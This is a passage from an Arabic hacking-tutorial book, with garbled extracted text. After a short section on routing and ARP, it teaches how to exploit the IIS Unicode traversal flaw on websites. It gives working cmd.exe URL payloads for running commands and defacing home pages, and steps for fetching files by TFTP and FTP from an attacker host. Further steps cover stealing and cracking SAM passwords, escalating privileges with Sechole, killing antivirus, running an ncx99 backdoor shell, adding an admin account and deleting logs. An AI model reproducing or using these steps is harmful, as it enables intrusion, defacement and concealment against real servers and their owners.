یختل ففي حجمهباختلا ف المساحات اليیعملفي نطاقها وقدقمت بزیارةلبع ض شركاتمزوديالخدمة<br />

عن طریق بع ضالاصدقاء ورایت عدة راوترات وبعدةاحجام واستطیعاناقولبان متوسط حجمهتقریبا<br />

٥٠ سم على شكل مكعب<br />

٤٠ سم *<br />

Routing in the Internet:<br />

===================<br />

what is routing?!<br />

الروتنج هو عباره عن طریقةمعینة والتي عن طریقهاتنتقلالمعلومات منكمبیوترالىاخراو من هوست<br />

الىاخر.‏<br />

وفى سیاقالانترنت یوجدثلا ث مظاهر منالروتنج وهم:‏<br />

Physical Address Determination -<strong>١</strong><br />

Selection of inter-network gateways -٢<br />

Symbolic and Numeric Addresses -٣<br />

ویعتبرالاولهو المهم فعندماتنتقلبیاناتال ip منالكمبیوتر.فمن الضرورىان نغل ف هذهالبیانات<br />

الخاصهبال ip بأىأطار مناى صیغهتكون متصلهبالشبكةالم حلیهللجهازاوبالشبكة المتص لبها<br />

الجهازفى حالتهالموجود علیها عندانتقال هذهالبیانا ت.‏ ویتطلب هذا الغلا فالتضمین من عنوانالشبكة<br />

الم حلیهاو العنوانالفیزیائىلهذا الشبكه مع الاطارالذى ی حیطبالبیانات ا ى (inclusion of a local<br />

network address or physical address within the frame).<br />

.<br />

و الشئالثانى من المذكوراعلاه مهمایضا و ضرورىلانالانترنت تتكون من عدد منالشبكاتالم حلیة<br />

مرتبطةبواحداوأكثر منالمداخلاىال.‏gateways و هذهالمداخل عموما<br />

احیانا یكونلها اتصالا تفیزیائیهاوبورتات مع الكثیر من<br />

تسمىبالروترسا ى<br />

الشبكات ‏.وتحدیدالمدخل الملائم والبورت لتفصیلبیاناتالip هذا ما نسمیه روتنجاى routing و<br />

تتضمنایضا داخلتبادلالمعلوما تبطرقمعینه<br />

اى local networks<br />

ال,‏ routers<br />

والثالث منالمذكورهوالذ ىیتضمنانتقالالعنواناىال address translation منالشكلالكتابى<br />

الذ ىنعرفه و نستطیع التعر ف علیهبسهوله والمقصود مثلا عنوانالمتصفحا ى<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/ الى ip ا ىالى اشیاء رقمیهمعقدهصعبه وتؤد ى هذهالمهمه عن طریق<br />

الDNS<br />

٩٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

Physical Address اى :<br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

والان ندخلفى شرح عملیهتحدید ال<br />

Physical Address Determination:<br />

===============================<br />

.<br />

اذاكان یرید جهازكمبیوتران ینقل ip data اذنفأنه یحتاجالىان یغل ف بأطار مخص ص وتابعللشبكة<br />

المتصلالجهازبها.‏ ولنجاح هذاالانتقالفى ظ لالتغلی فبهذاالاطار من الضرورىان نحدد ما یسمىبال<br />

physicalلأتجاهالكمبیوتر.‏ address و هذایتمبنجاح و ببساطه عن طری قاستخدام جدول سو ف<br />

یوضحكیفیهتحویلال ip الى , addresses physicalفمثلا هذاالجدول یحتوى على عناوینال ip<br />

للشبكة اوالعنوان المعرو فلها<br />

ولل حصول على هذا الجدول وقرائته منالطبیعىان یكونالكمبیوتر یستخدمبروتوكولمعینلل حصول<br />

على هذا الجدول وتحویلال ipالى physical addresses و هذاالبروتوكولیعر فبأسم ARP اى<br />

Addressاىبروتوكولت Resolution Protocol حلیل العنوان واعتقدانناالانادركنا وفهمنا<br />

معنىكلمهتحویلال ipالى , addresses physicalو یمكناننعر ف هذاالجدول بأسم ARP<br />

cache .<br />

ولل حصول على الجدول نستخدمامر arp a- وفىالیونكسایضا نستخدم نفسالامر.‏<br />

و هذا مثال حى على الجدولالذى یظهر بعدتنفیذ الامر<br />

:<br />

C:\ WINDOWS>arp -a<br />

Interface: 62.135.9.102 on Interface 0x2<br />

Internet Address Physical Address Type<br />

207.46.226.17 20-53-52-43-00-00 dynamic<br />

213.131.64.2 20-53-52-43-00-00 dynamic<br />

213.131.65.238 20-53-52-43-00-00 dynamic<br />

الانترنتادرسالموجودامامكم هذاهى عناوینكل الشبكاتالمتصلهبجهاز ى بعد دخولى الىالانترنت<br />

وال Physicalاعتقدانكمتلاحظونانهثابت Address لایتغیر وبهذا یمكنناان نقول و نوضحلكم<br />

انال Physicalهذا Address هوال Macا Address ى رقم الجهاز نفسه الذى تتصلبه<br />

النتوركس اثناءالعمل ولذلكفقدقلتفىكلامىانتحدیدال Physical Address مهم جداافى<br />

اذنفكی ف ستعر فالباكیدجس<br />

عملیه<br />

الموجودهفىال routerعلى طریقها.‏<br />

وال type هذا مكتوب dynamic ا ىانه غیرثابتبمعنىانهیتغییر عند عمل ریستارتلكل مرهفى<br />

الجهاز ولكنه یثبت اثناءالعمل علىالانترنت .<br />

و هناكالنو عالاخر وهوال staticاى الثابتالذ ى لایتغیر ‏"هذافقطللتوضیح "<br />

نقلمعلوماتاوبیاناتال ip لانهبدون Physical Address<br />

اعتقدالاناننافهمنابمعنىبسیط<br />

ما هوالروتنج و ماهىالrouters<br />

...<br />

٩<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

الفصل الثالث<br />

<br />

‏((مقتطفات عن<br />

السیرفراتوالأنظمة))‏<br />

٩٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

"<br />

الإختراق عن طریق الیونیكود<br />

‏(الجزء الأول)‏ "<br />

$$$$$$$$$$$$$$$<br />

الكاتب sNiper_hEx:<br />

$$$$$$$$$$$$$$$<br />

یحتو ى الدرسالاول على<br />

) <strong>١</strong>٣ نقطة<br />

( وهيكما یلي<br />

- :<br />

.<br />

.<br />

- تعری فبالیونیكود .<br />

- تاریخ ظهور هذهالثغرة<br />

- كیفیةایجاد هذه الثغرات<br />

- كی فیتماستغلالثغراتالیونكود<br />

الاوامرالمستخدمةبواسطة مل ف<br />

طریقةتطبیق هذهالثغرات<br />

- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامر ال . ECHO<br />

طریقة نسخ مل فال CMD لاتاحةامكانیةالكتابة على الملفات .<br />

كیفیةمعرفة مشكلةال Access Denied وال حلول المتبعةلها .<br />

- كیفیة عملاكاون تللدخولبواسطة ال . FTP<br />

طریقةكش فباسوردالادمینستریتور<br />

- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج<br />

مسح ملفات اللوق حتى لایتمالتعر ف علیك<br />

. TFTP<br />

.<br />

.<br />

. CMD<br />

.<br />

.<br />

-<br />

-<br />

-<br />

-<br />

-<br />

-<br />

٩٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

IIS4.0 /<br />

- تعری فبالیونیكود .<br />

الیونیكود عبارة عن مجموعة من الثغراتفي مجموعة خدمةالمعلوماتالتي ركبت مع<br />

IIS5.0 والذي یاتي عادة مع<br />

. NT4 / Win2k<br />

.<br />

- تاریخ ظهور هذهالثغرة .<br />

لایوجدتاریخ محددلظهوراولثغرةللیونیكودلذایعتبر ظهورهابواسطة شخ ص مجهول<br />

،anonymous person وقیلاناول ظهورلثغراتالیونیكودكانتبواسطة الصینین ولكن لایوجد<br />

مایثبت صحة هذا الكلام لهذه الثغرات،‏ فتماستغلال هذه الثغرات منقبلالمخترقینوتطویرالبرامج<br />

اللازمةلها .<br />

- كیفیةایجاد هذه الثغرات<br />

یتمایجاد هذهالثغرا تبطریقتین -:<br />

<strong>١</strong>- بواسطةالبرامج اللازمة والمخصصةلكش ف هذهالثغرات سواءبالبرامجالتيتعمل على<br />

نظام ویندوزاوبطریقة الشل والتيتعمل على نظاملینكس<br />

٢- بواسطةتطبیق الثغرة علىالموقع مباشرة<br />

.<br />

.<br />

.<br />

.<br />

-<br />

- كی فیتماستغلالثغراتالیونكود<br />

عندتطبیقالثغرة على نظام ال IIS4 / IIS5 یبدا مل ف CMD بفك شفرةالیونكودفي المثالالخطاء<br />

ومنهنایتماستغلالها<br />

الاوامرالمستخدمةبواسطة مل ف . CMD<br />

الاوامرالمستخدمهبواسطة مل فال CMD وهيامر لانشاء دلیل جدید وامر لالغاء دلیل وامر النسخ<br />

وامرالنقل وامر الحذ ف وامرتغییراسماءالملفات وامرلرؤیة محتویات المل ف وامر الكتابة داخلأي<br />

مل ف وامرلسحبأي مل ف ، وهي حسبالامثلةالتالیة<br />

‏:امرانشاء دلیل جدید<br />

-:<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />

exe?/c+md+c:\hEx<br />

‏:امرالغاء دلیل<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />

exe?/c+rd+c:\hEx<br />

للمعلومیة:‏ لایمكنالغاءأي دلیلالااذاكانفارغاًتمام من الملفات والمجلدات<br />

الامر المستخدم<br />

: للنسخ<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />

exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe<br />

الامر المستخدم<br />

: للنقل<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+m<br />

ove+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\<br />

٩٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

‏:الامر المستخدم للحذ ف<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />

exe?/c+del+c:\hEx.mdb<br />

‏:الامر المستخدم لتغییر مسمى الملفات<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+re<br />

n+c:\index.htm+hEx.htm<br />

‏:الامر المستخدملرؤیة محتویات الملف<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.<br />

exe?/c+type+c:\hEx.txt<br />

‏:الامر المستخدمللكتابة داخلأي مل ف<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ec<br />

ho+sNiper_hEx+>c:\hEx.txt<br />

‏:الامر المستخدم لعملیة سحب أي مل ف<br />

علیكالقیاماولاًبنسخالمل فالمراد سحبهالىأي دلیل وبعدهایتم كتابةاسمالمل ففياخرالعنوانكالتالي<br />

:<br />

http://www.xxxx.<strong>com</strong>/msadc/hEx.mdb<br />

.<br />

-<br />

تطبیقالثغرة على الموقع من خلالالمتصف ح تتم حسبالامثلةالتالیة -:<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir<br />

+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir<br />

+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

http://www.xxxx.<strong>com</strong>/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+di<br />

r +c:\<br />

وقد نحتاج الىتغییر مسمىالدلیلب حی ث یكون -:<br />

Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin<br />

طریقةتطبیق هذهالثغرات<br />

٩٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

.<br />

- كیفیةاختصارثغرةالیونیكود حتى تتمكن منتفعیلامرال ECHO<br />

في حالة اكتشا ف موقعیعاني من مشكلةالیونیكود ولنفتر ضانهكان على هذه الثغرة<br />

-:<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />

md.exe?/c+dir+c:\<br />

فنحتاج الى نسخ مل ف w3svc.exe الى مجلد inetpub\scripts والامر یكونبهذهالطریقة<br />

- :<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />

md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3sv<br />

c.exe<br />

بعد نسخ مل ف wالى 3 svc.exe مجلد inetpub\scripts ‏،الان نقوم بتصفح الموقع من خلال<br />

الثغرةبهذه الطریقة<br />

- :<br />

http://www.xxxx.<strong>com</strong>/scripts/w3svc.exe?/c+dir+c:\<br />

الان نستطیعالكتابة داخلأي مل ف وبالتحدیدالمل فالرئیسيللموقع الذي غالبا مایكونفي هذاالدلیل<br />

inetpub\wwwroot\index.htmب حی ث یكونالامربالشكلالتالي<br />

-:<br />

http://www.xxxx.<strong>com</strong>/scripts/w3svc.exe?/c+echo+Hacked+By+sNipe<br />

r_hEx+hExRay@Hotmail.<strong>com</strong>+>+c:\inetpub\wwwroot\index.htm<br />

-<br />

طریقة نسخ مل فا CMD لاتاحةامكانیةالكتابة على الملفات .<br />

الغر ض من نسخ مل ف الCMD وهو لاعطاءامكانیةللكتابة داخلالسیرفرفي بع ضالحالات ویتم<br />

نسخهالى مجلدالسیكربتبهذه الطریقة<br />

-:<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />

md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd<br />

1.exe<br />

الانبامكاننااستخدام مل فالCMDالجدیدفي الثغرةبدلا منالاولبهذا الشكل<br />

- :<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />

md1.exe?c+dir+c:\<br />

- :<br />

-<strong>١</strong><br />

‏-كیفیةمعرفة مشكلة ال Access Denied وال حلولالمتبعةلها .<br />

تتممعرفة مشكلةال Access Denied من خلال المحاولةفي حذ فأي مل ف منأيامتداد،‏ فعند<br />

ظهور رسالةال Accessفالیك Denied هذه الطرق حتى تتمكن من الكتابة علىالملفات والتحكم<br />

اكثر علىالسیرفر<br />

الطریقةالاولى نسخ مل فال CMD الى دلیلالسیكربتبمسمى CMD1‎فسوفیتا حلكامكانیة<br />

الكتابةباستخدامالامر<br />

Copyباستخدام هذاالامر<br />

-:<br />

http://www.xxxx.<strong>com</strong>/msadc/..%c0%af../..%c0%af../winnt/system32/c<br />

md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd<br />

1.exe<br />

-٢<br />

الطریقةالثانیةبالتعامل معالمل ف ssinc.dll والطریقةكما یلي<br />

اولاانشاء صفحةباسم<br />

- :<br />

test.shtml<br />

o<br />

٩٦


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

wwwroot/hEx/test.shtml<br />

o<br />

o<br />

o<br />

o<br />

o تكون هذهالصفحة داخل مجلد<br />

o كتابة هذا الكود داخلالصفحة !< file="AAAA[...]AA#-- include‏"-->ب حیثان<br />

حر فAیتم كتابتة حتىیتعدى ٢٠٤٩ حر ف<br />

الانیتم طلبالصفحة من خلالالمتصفح<br />

الان سو فتظهرلكالصفحة<br />

.<br />

http://www.xxxx.<strong>com</strong>/test.shtml<br />

.<br />

الانتستطیعالكتابهوتمتخطي مشكلةالDenied . Access<br />

.<br />

.<br />

-٣<br />

- ٥<br />

اذا ظهر تلك صفحةالخطاء رقم ‎٥٠٠‎فمعناهاانكلمتقم بتطبیقالطریقةبالشكلالص حیح<br />

وعلیكاعادة المحاولة<br />

الطریقة الثالثةباستخدامبرنامج NC.exeب حی ثیتم عملابلوودلهذاالمل ف داخل مجلد ال<br />

Tempفي دلیلالویندوز ومنهیتمتنفیذالاوامر من خلال موجةالدوز وللمعلومیة مجلدال<br />

Temp مفتوح لعملیاتالابلوود<br />

- ٤ الطریقة الرابعة وهي من خلال عملكرا شللسیرفرباستخدامالبرامجاللازمةلهذا الغر ض وهذه<br />

الطریقة غیر مجدیهفيكثیر منالاحیان .<br />

الب حث عن ملفات<br />

ونسخهاالى مجلد c:\inetpub\scripts وتطبیق الثغرة من خلالها .<br />

w3svc.exe ، shell.exe ، sensepost.exe ، root.exe :<br />

- كیفیة عملاكاون تللدخولبواسطةال<br />

نسخ مل ف CMDالى مجلد Scriptsباسم Shell.exe حتىیتمالاستفادة منثغرةقدیمة<br />

. FTP<br />

-<strong>١</strong><br />

/c + copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe<br />

open ftp.host.<strong>com</strong> وكتابةفیهالتالي Echo mspft.pllبواسطةالامر -٢<br />

انشاء مل ف<br />

حیثان هذاهو الخادمللFTP .<br />

/c+echo+open+ftp.host.<strong>com</strong>+>+c:\winnt\mspft.ppl<br />

-٣<br />

/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl<br />

-٤<br />

الان مطلوباضافة مجهول Anonymousالى نفسالمل فالذيقمنابانشاءه<br />

mspft.pll<br />

الان مطلوبادراج البرید hExRay@Hotmail.Comالى نفس المل ف الذيقمنابانشاءه<br />

mspft.pll<br />

/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl<br />

mspft.pll<br />

/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl<br />

-٦<br />

/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl<br />

٧- یتم هناادراجالموقعالحاليللملفات<br />

/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl<br />

-٨<br />

‎٥‎‏-إ ضافة Userقبل Anonymous لزوم المل ف الذيقمنابانشاءه<br />

الانتكرار لحاجةالاعداد<br />

الان یكتباوامر الFTPاللازمةلسحبالمل ف من خادم الFTP وهي Getثم index.htm<br />

یدرج هنابدونالمسجالسابق<br />

/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl<br />

Quit<br />

/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl<br />

FTP.exe?+"-s:c:winnt\mspft.ppl”<br />

-<strong>١</strong>٠<br />

-:<br />

- Open FTP.host.<strong>com</strong><br />

٩- هنا نفس السابق ولكنباضافة<br />

الانیتمتنفیذامر<br />

بانشاءها وموجودةفي مل ف mspft.pplباحتوائها على مایلي<br />

وهو عبارة عن خطواتقمنا<br />

٩٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

- Anonymous<br />

- hEx@Hotmail.Com<br />

- User Anonymous<br />

- hEx@Hotmail.Com<br />

- Get index.html<br />

- Quit<br />

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-<br />

s:c:\winnt\mspft.ppl"<br />

.<br />

) L0phtCrack ( Microsoft Access – وهي لزومتنفیذ بع ض<br />

- :<br />

-<br />

-<br />

طریقةكش فباسوردالادمینستریتور<br />

نحتاج الى وجودبرنامجین<br />

الخطوات لتالیة وهي<br />

باسوردالادمینستیتورللسیرفر یكون موجودفي مل فال ‏_.‏SAMفي دلیل<br />

وافضلبرنامج لفك شفرةالباسورد هوبرنامج Lكماهو 0 phtCrack موضحبالشكل التالي:-‏<br />

\winnt\repair\<br />

-<br />

اذاكان هناك مستخدمینفيالسیرفر ویوجدلدیهم حسابفانمعلوماتهم سو فتكونفي ملف<br />

PASSFILT.DLL ونستطیعتحدید مسار هذ االمل ف من خلالالریجستريبواسطة هذا المفتاح<br />

- :<br />

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\S<br />

YSTEM32\PASSFILT.DLL<br />

-<br />

اذاكانالسیرفریعتمدفي القراءةباستخدام صفحاتال ASPللوصولالىالبیانات من خلال<br />

قاعدة ال MySQLفسو ف نحتاج الىتطبیقثغرة<br />

المسئول عن هذةالقاعده وهيكالتالي<br />

) +.htr ( للوصول الىباسورد<br />

- :<br />

http://www.xxxx.<strong>com</strong>/default.asp+.htr<br />

عند ظهور صفحةالخطافي الوصول الى الصفحةالمطلوبة وبالتحدیدفي سیكربتالتنفیذفالطریقة<br />

ص حیحة وماعلینافقط سوى سحب مل ف database.inc وقراءة محتویاتهللعثور علىاسم<br />

المستخدم والباسوردللمسئول عنقاعدةالبیانات .<br />

٩٨


hi_HaCkEr & MaXhAk2000<br />

. TFTP<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

- تغییر الصفحةالرئیسیةللموقع وعملیةالابلوودبواسطةبرنامج<br />

قمبانشاء صفحة وضعشعارك علیها واحفظهاباسم index.htm علىال<br />

قم بتشغیلبرنامج TFTP ونفذالامرفي الفقرةالتالیة<br />

c:\<br />

.<br />

/c+tftp.exe+"-<br />

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\i ndex.htm<br />

-<strong>١</strong><br />

-٢<br />

وهوالبرنامجاللازم لعملالابلوود ویجبان یكون شغالفي حالةتنفیذ<br />

الامر<br />

وهوبمثابةبارامیترز لزومقراءالبیاناتفي مكتبة الملفات<br />

tftp.exe<br />

"-i"<br />

رقمالایبيالخا صبك 1.1.1.1<br />

وهوالامراللازملطلب الملفات مابینالارسال والاستقبال<br />

اسمالمل فبجهازك<br />

اسمالدلیلفيالسیرفر<br />

GET<br />

index.htm<br />

\inetpub\wwwr<br />

oot\<br />

index.htm<br />

اسمالمل ف علىالسیرفر<br />

.<br />

-<br />

مسح ملفات اللوق حتى لایتمالتعر ف علیك<br />

وتتم هذهالعملیة من خلال حذ ف ملفاتال Log من مجلد<br />

System32‎بواسطةالامر<br />

- :<br />

/c+del+c:/winnt/system32/logfiles/*.log<br />

....<br />

٩٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$<br />

XDEMONX:<br />

$$$$$$$$$$$$$$<br />

الكاتب<br />

..<br />

الإختراق عن طریق الیونیكود<br />

‏(الجزء الثاني)‏ "<br />

في الدرس الأول كان عبارة عناوامراساسیة یستطیعالجمیعتطبیقها ‏..امافي هذا الدرسفالأمر<br />

یتطلب بع ضالذكاء والمهارة<br />

البدایة<br />

..<br />

:<br />

--------------<br />

عند وجود موقع مصاب بثغرة ما ‏(یونیكود)فاناول شي علیكالقیامبه هو نسخ مجلد cmd الى cmd1<br />

بهذهالطریقة:‏<br />

C+copy+c:\winnt\system32+<br />

Echo .. هوتفعیلامر الكتابة c:\winnt\system32\cmd1.exeوالسبب<br />

وبعد ذلك نفذالثغرة منالمل فالجدید ( CMD1.exe هذا شيیعرفه الجمیع ‏)لكنللتذكیرفقط !<br />

الان عندتصف حكلملفاتالموقع منالمتصفح من خلال هذهالثغرةفانه سیكونلدیك صلاحیات<br />

IWAM_USERوهذا المستخدم هو عبارة عن یوزرینتميللمجموعه Guest وهوالیوزرالمسؤوول<br />

عنتشغیل سیرفر.‏ IIS<br />

وبماانه من مجموعة Guestفهو لا یملك صلاحیاتكثیرة ‏!!الااذاتماعدادهبشكل سيء :)<br />

(: هذافيانظمة *nix امافي Microsot<br />

..<br />

لایوجد شياكثرادمانا من محاولةال حصول على رووت<br />

فالوضع مختل ف ‏:)فإن محاولةال حصول على صلاحیات Administratorلیسبالسهولةالتي تتوقعها<br />

‏:)فرفعالامتیازا تبشكل م حليفيانظمة مایكروسوفت ممكنفقطبطر ققلیلة لایتعد ى عددهااصابعالید<br />

الواحده .. وانااكتب هذاالموضو ع لاشر حكیفیةاحكامالسیطرة علىالسیرفر وال حصول على حساب<br />

موارد النظام<br />

مكافيءللمدیر<br />

‏+الملفات المطلوبة<br />

:) والتمتعبجمیع<br />

:<br />

Sechole.exeوملحقاتها.‏<br />

Kill.exe<br />

Tlist.exe<br />

ncx99.exe<br />

tftpd32.exe<br />

جهز العده :) ..<br />

لتوفیرالوقت جمعتهافي مجلد واحدهنا<br />

الان سأشرح عملكلاداة :<br />

)<br />

-<strong>١</strong><br />

Secholeوهواقوىاستثمار موجودلرفعالامتیازا تبشكل م حلي ‏..وطریقة عمله بشكل مبسط)‏<br />

بأنهیعتمد على صد عفي نواة ویندوزانتي ‏..یستطیع من خلاله اغتصاب عملیةتابعهلمدیرالنظام یقوم<br />

<strong>١</strong>٠٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

من خلالهابرفعامتیازاتك<br />

. (:<br />

list -٢<br />

(:<br />

تقوم بعر ض جمیعالعملیاتالتيتعملبالخلفیه .. والفائده منها هواقفال الفایروول ‏+الانتي<br />

فایروس<br />

٤- Kill.exeعملها متم مللاداةالسابقة حی ث ستقومباقفال رقمالعملیة المستخرج منالاداة السابقة<br />

NCX99‎نسخه ٥ مطورة من الباكدوور NCینصت علىالمنفذ ٩٩<br />

لنقل الملفاتالىالسیرفر<br />

.<br />

..<br />

4- TFTP32.exe<br />

كل ما سبقكان عبارة عن مقدمه ‏:)اماالعملالحقیقي سیبدأالان<br />

:<br />

اولاقمبرفع جمیعالادواتالسابق الىالسیرفر<br />

ثمقم بتشغیل ncx99.exeبهذاالشكل مثلا<br />

..<br />

:<br />

http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe<br />

بعد ذلكقمبالاتصالبالموقع علىالبورت .. ٩٩<br />

ست حصل على سطراوامر CMDبدون<br />

الانقم بتشغیلالاداة .. TLIST ستعر ضلك جمیعالعملیاتالتيتعمل ‏..قمبالب حث عن رقمالعملیة<br />

صبالانتيفایروسان وجد .. وكذلكاذا وجدت جدار ناري<br />

PIDالخا صبالانتيفایروس والفایروول على ورقه جانبیه<br />

سجل رقم PID الخا مكان PIDتضع رقمالعملیة<br />

مالهد ف مناقفالالانتيفایروس ؟ الاجابة ‏..أن التحدیثاتالاخیرة منانتيفایروس<br />

ض یسأل البع تتعامل مع Sechole علىانهباكدور .. والان بعد اتمامالعملیاتالسابقةبنجاح ‏..قم بتشغیل<br />

(:<br />

امتیازا ت.‏ = Guest<br />

..<br />

..<br />

الانقم بقتلالاجراءبالاداة Killبهذاالشكل .. PID : KILL.exe<br />

!<br />

(: Sechole.exeمنالمتصفح.‏<br />

..<br />

..<br />

.<br />

عندها سیتم رفمامتیازا ت IWAM_USER الى مجموعه..‏ Administrators<br />

الان بإ مكانكتنفیذه جمیعالاوامر بكاملالحریه وبدوناي مشاكلفيالصلاحیا ت.‏ Access Denided<br />

وطبعااهم شيالكتابة على الصفحهالرئیسیةبامرالایكو:‏<br />

C+Echo+Hacked+by+XDeMoNX+<br />

> +C;\inetpub\wwwroot\index<br />

.htm<br />

ولكنلیس هذاكل شي<br />

القراصنهالاذكیاء لا یبحثونفقط عنتغییر الصفحهالرئیسیة خصوصااذاكانالموقع مهماو یحتوي على<br />

معلوماتاوقواعدبیانات ‏...إلخ :)<br />

سؤال ‏:هلتستطیع الدخولبهذاالیوزر ؟ IWAM_USER الىاي خدمه مثلتلنتاوا فتيبي ؟؟<br />

الاجابة ‏:لا ص حیحانناقمنابرفعامتیزاتهلكننا لا نملككلمه المرور ‏!لانها س تكون مسندهبشكل<br />

عشوائي<br />

<strong>١</strong>٠<strong>١</strong>


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

سیذهبتفكیر البع ض الى ال حصول على مل فالسام وكسره :) هذا ممكن ‏..لكن یوجد ماهواسهل .<br />

بمااننالدینا حساب مكافيل Administrator ولكننا لا نملككلمةالمرور ما رأیكبإ ضافه یوزر جدید<br />

باسمك معباسورد خاصهبك معامتیازات المدیرایضا !! ‏:)قلیل من الذكاء والتفكیر<br />

قمبانشاء مستند نصي جدید واض ف السطر التالي<br />

.<br />

(:<br />

:<br />

net user Demon pass /add && net localgroup administrators Demon<br />

add.bat واحفظهاباسم.‏ Save as add‏/والان<br />

:<br />

(: المدراء ..<br />

)<br />

(:<br />

(:<br />

..<br />

توضیح ما فعلناه سابقا هوانشاء مجلد دفعاتي یقومبانشاء یوزر جدید Demon وكلمة مرور Pass<br />

واضافتهالى مجموعةالادمنستریتورز<br />

قمالانبرفعالمل ف add.batثمتشغیلها منالمتصفح بواسطةالیونكود)‏<br />

الانلدیك حساب مدیر :) وتستطیعالدخولالىاي خدمه ‏..ا فتيبياوتلنتاو ن تبیوساو غیرها<br />

لاتنسىفيالنهایة مسحالاثار واضافةالابوابالخلیةالخاصةبك لتسهیل الدخولفي المراتالقادمه<br />

طبعالن اتوسعفي هذا الجانب لانه ‏(لكلشیخ طریقة!)‏ وكل واحدلهاسلوبفياخفاءادواته والتحكمفي<br />

الملفات .<br />

(:<br />

نرجعلنقطة سابقة<br />

